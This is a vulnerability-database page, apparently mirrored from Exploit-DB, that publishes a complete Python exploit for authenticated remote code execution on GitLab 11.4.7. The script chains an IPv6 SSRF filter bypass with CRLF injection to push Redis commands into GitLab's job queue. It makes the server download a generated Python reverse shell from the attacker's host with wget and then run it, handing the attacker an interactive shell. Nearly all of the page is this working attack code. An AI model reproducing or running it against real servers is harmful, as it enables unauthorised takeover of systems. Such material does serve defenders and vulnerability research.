Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

GitLab 11.4.7 - Remote Code Execution (Authenticated)

🗓️ 16 Dec 2020 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 585 Views

GitLab 11.4.7 Authenticated Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
FreeBSD		Gitlab -- Multiple vulnerabilities
28 Nov 201800:00
freebsd
Circl		CVE-2018-19585
17 Jan 202303:16
circl
CNVD		GitLab CE/EE server-side request forgery vulnerability (CNVD-2019-23579)
11 Jul 201900:00
cnvd
CNVD		GitLab CE/EE CRLF Injection Vulnerability
20 May 201900:00
cnvd
CVE		CVE-2018-19571
10 Jul 201916:01
cve
CVE		CVE-2018-19585
17 May 201915:09
cve
Cvelist		CVE-2018-19571
10 Jul 201916:01
cvelist
Cvelist		CVE-2018-19585
17 May 201915:09
cvelist
GithubExploit		Exploit for Server-Side Request Forgery in Gitlab
11 Apr 202111:23
githubexploit
Debian CVE		CVE-2018-19571
10 Jul 201916:01
debiancve
Rows per page
# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
# Date: 15th December 2020
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Software Link: https://about.gitlab.com/
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
# Tested on: GitLab 11.4.7 CE
# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)

import requests
import re
import warnings
from bs4 import BeautifulSoup
import sys
import base64
import urllib
from random_words import RandomWords
import argparse
import os
import time




parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
parser.add_argument('-U',help='GitLab Username')
parser.add_argument('-P',help='Gitlab Password')
parser.add_argument('-l',help='rev shell lhost')
parser.add_argument('-p',help='rev shell lport ',type=int)
args = parser.parse_args()


username = args.U
password = args.P
lhost = args.l
lport = args.p


#Retrieve CSRF Token

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
gitlab_url = "http://10.129.49.62:5080"
request = requests.Session()
print("[+] Retrieving CSRF token to submit the login form")
time.sleep(1)
page = request.get(gitlab_url+"/users/sign_in")
html_content = page.text
soup = BeautifulSoup(html_content,features="lxml")
token = soup.findAll('meta')[16].get("content")


print("[+] CSRF Token : "+token)
time.sleep(1)


#Login

login_info ={
            "authenticity_token": token,
            "user[login]": username,
            "user[password]": password,
            "user[remember_me]": "0"
}


login_request = request.post(gitlab_url+"/users/sign_in",login_info)


if login_request.status_code==200:
	print("[+] Login Successful")
	time.sleep(1)

else:

	print("Login Failed")
	print(" ")
	sys.exit()




#Exploitation

print("[+] Running Exploit")
time.sleep(1)
print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
time.sleep(1)

ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"


r = RandomWords()
project_name = r.random_word()
project_url = '%s/%s/'%(gitlab_url,username)

print("[+] Creating Project")
time.sleep(1)
print("[+] Project Name : "+project_name)
time.sleep(1)

print("[+] Creating Python Reverse Shell")
time.sleep(1)


python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)


os.system("touch shell.py")
shell_file = open("shell.py","w")
shell_file.write(python_shell)
shell_file.close()


print("[+] Reverse Shell Generated")
time.sleep(1)

print("[+] Start HTTP Server in current directory")


print("Command : python3 -m http.server 80")
time.sleep(2)

http_server = raw_input("Continue (Y/N) : ")

if (http_server=="N") or (http_server=="n"):
	print("Start HTTP Server before running exploit")

elif (http_server=="Y") or (http_server=="y"):

	
	
	print("Run this script twice with options below to get SHELL!")
	print("")
	print("Option 1 : Download shell.py rev shell to server using wget")
	print("Option 2 : Execute shell.py downloaded previously")

	option = raw_input("Option (1/2) : ")


	if option=="1":



		reverse_shell= """\nmulti
		 sadd resque:gitlab:queues system_hook_push
		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
		 exec
		 exec
		 exec\n""" %(lhost)
		 
		 
		project_page = request.get(gitlab_url+"/projects/new")
		html_content = project_page.text
		soup = BeautifulSoup(html_content,features="lxml")
		project_token = soup.findAll('meta')[16].get("content")
		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
		urlencoded_token1 = project_token.replace("==","%3D%3D")
		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
		

		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)






		proxies = {
			"http" : "http://127.0.0.1:8080",
		     	"https" : "https://127.0.0.1:8080",
			    }
			    
		cookies = {
		    'sidebar_collapsed': 'false',
		    'event_filter': 'all',
		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
		    '_gitlab_session':request.cookies['_gitlab_session'],
		}

		headers = {
		    'Host': '10.129.49.31:5080',
		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
		    'Accept-Language': 'en-US,en;q=0.5',
		    'Accept-Encoding': 'gzip, deflate',
		    'Referer': 'http://10.129.49.31:5080/projects',
		    'Content-Type': 'application/x-www-form-urlencoded',
		    'Content-Length': '398',
		    'Connection': 'close',
		    'Upgrade-Insecure-Requests': '1',
		}



		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)

		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
		print("[+] Success!")
		time.sleep(1)
		print("[+] Run Exploit with Option 2")
		
		
	elif option=="2":

		reverse_shell= """\nmulti
		 sadd resque:gitlab:queues system_hook_push
		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
		 exec
		 exec
		 exec\n"""
		 



		project_page = request.get(gitlab_url+"/projects/new")
		html_content = project_page.text
		soup = BeautifulSoup(html_content,features="lxml")
		project_token = soup.findAll('meta')[16].get("content")
		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
		urlencoded_token1 = project_token.replace("==","%3D%3D")
		urlencoded_token_final = urlencoded_token1.replace("+","%2B")


		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)






		proxies = {
			"http" : "http://127.0.0.1:8080",
		     	"https" : "https://127.0.0.1:8080",
			    }
			    
		cookies = {
		    'sidebar_collapsed': 'false',
		    'event_filter': 'all',
		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
		    '_gitlab_session':request.cookies['_gitlab_session'],
		}

		headers = {
		    'Host': '10.129.49.31:5080',
		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
		    'Accept-Language': 'en-US,en;q=0.5',
		    'Accept-Encoding': 'gzip, deflate',
		    'Referer': 'http://10.129.49.31:5080/projects',
		    'Content-Type': 'application/x-www-form-urlencoded',
		    'Content-Length': '398',
		    'Connection': 'close',
		    'Upgrade-Insecure-Requests': '1',
		}



		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)

		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
		print("[+] Success!")
		time.sleep(1)
		print("[+] Spawning Reverse Shell")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Dec 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 25
CVSS 3.17.7
CVSS 37.5
EPSS0.26718
exploitauthenticated rcecsrfloginexploitationhttp servergitssrfcrlfremote code executionsecurity document
585